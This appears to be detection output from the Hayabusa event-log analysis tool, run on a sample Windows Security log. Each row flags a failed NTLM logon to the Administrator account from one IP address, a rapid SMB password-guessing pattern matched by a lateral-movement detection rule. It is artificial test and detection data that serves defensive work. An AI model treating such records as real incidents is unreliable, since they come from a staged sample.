2016-09-20 01:50:25.269 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Uz7yqqxdMrsM2L1g | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:25.308 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wqKTguT2Z3OPCxGR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:25.352 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ywpwCM4u6nFSq9oS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:25.407 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: k1t5ZBw3HOxux65e | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:25.534 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MtLFQSltjjOjdl2c | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:25.593 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AyFD3cjef0NUMZZ5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:25.656 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uDYECnF1YTKRKA3K | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:25.700 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pfqxcIVpX9BbsPIM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:25.745 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mjL5hvyYesMfDISw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:25.774 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3bh8c5ohv55SAX26 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:25.817 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MflfcFDnGU3xUOmz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:25.859 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aX0wfTs5FzCdwGrR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:25.895 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9gdU6faDjEH5wW2X | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:25.929 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 507PC8xD6l0TbhG3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:25.973 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VrWgYcf9EuXt4MHS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:26.088 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GvIGEw3fdX9cDzIV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:26.159 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9X1q0dT5irWa44Rz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:26.307 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZpgAkElSQjVo53z2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:26.410 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7nxUEwRMaiAhiIXv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:26.453 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vIoaysmFNfEerv8f | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:26.528 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aHLhFgL0xfnrAIoF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:26.619 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YGK96B1hDPMK9YKh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:26.704 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yhDnNRDnAwctVtgQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:26.793 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8zzO7RKaBPpg549A | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:26.859 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zDgDGO3IKiLoIQ5D | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:27.024 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0aaYeBTUEudC3446 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:27.093 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: I41H8U06uuGlMf9S | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:27.170 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: r6Eh55149gbuU2el | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:27.248 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ajzJabQi7CjosFQ1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:27.290 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: l9y7gyU9aJi6Fpm3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:27.361 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hbLiIVcBYlu5JkX2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:27.424 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bDfEfHk54J3lJI6m | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:27.496 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WOpuMTECalyeObl7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:27.537 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nZQYU1dyQOqlNJDL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:27.577 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pc58gDT07WNH3mMz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:27.624 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EhExnDfInKbEI6AO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:27.710 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qKKTTQ0ZT2Ye4TV9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:27.772 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LdBFYyftnH67Gyh5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:27.812 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eO6c2PDl7zVBGzPi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:27.848 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1ONnDOs16EnBkdFv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:27.897 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aTHHCX9EoKRY4zhR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:27.939 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: f1jhH08oLzpONDpa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:27.976 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: o2YK7zc7Ne9c8txA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:28.013 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 86CrOo9CFreIzSM5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:28.056 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0X9UEojEnc350xPc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:28.096 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9g3PO3jofnySl92G | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:28.176 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5TRndfQmPYuhV0Ri | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:28.204 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yyJOdaks4B1sKMDv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:28.252 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IB3OSmcFx5TUiiJX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:28.309 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lo3Ex40dkIeO53HF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:28.352 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AkzDG8QOM2cxbokF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:28.395 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YoMf36ZXJBLnYxtc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:28.436 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5izPIefHqDDWNDlu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:28.476 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: z9o4f1XvvcVXBNwL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:28.521 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IjCR48ZJFyEhzrYI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:28.556 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mUV9i4O2gapcC01d | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:28.608 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XJzGAMQCvJBFOUPq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:28.645 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Fyyu0x6I29R2J10Y | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:28.687 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8lCe1shqSs0xNwAJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:28.728 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ipZAMvm56d5mE9Fc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:28.774 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XX9N7jodTuEYBCSE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:28.814 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: h5DBFGpzfJJ7gYV1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:28.848 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fQ3qTwcWkXJDuXDI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:28.889 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TOfkvLSo2HuhMtvk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:28.940 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: y9DQUhPQHvvwAO0C | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:28.990 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yao1JM0tSFv5IHnL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:29.037 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NXGm63wiZz3ZYFb9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:29.077 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: izvPgZCO2GRVLhId | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:29.119 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: iI9zO2o7jd922pfK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:29.164 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UnAGy86My6hVwt4J | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:29.208 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HhFTzONSVEziRtgq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:29.251 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QdEv4ooC8AApqU1T | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:29.292 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TxFGRBKVK732Aeu4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:29.336 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ITg8QH90LKkAQMLL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
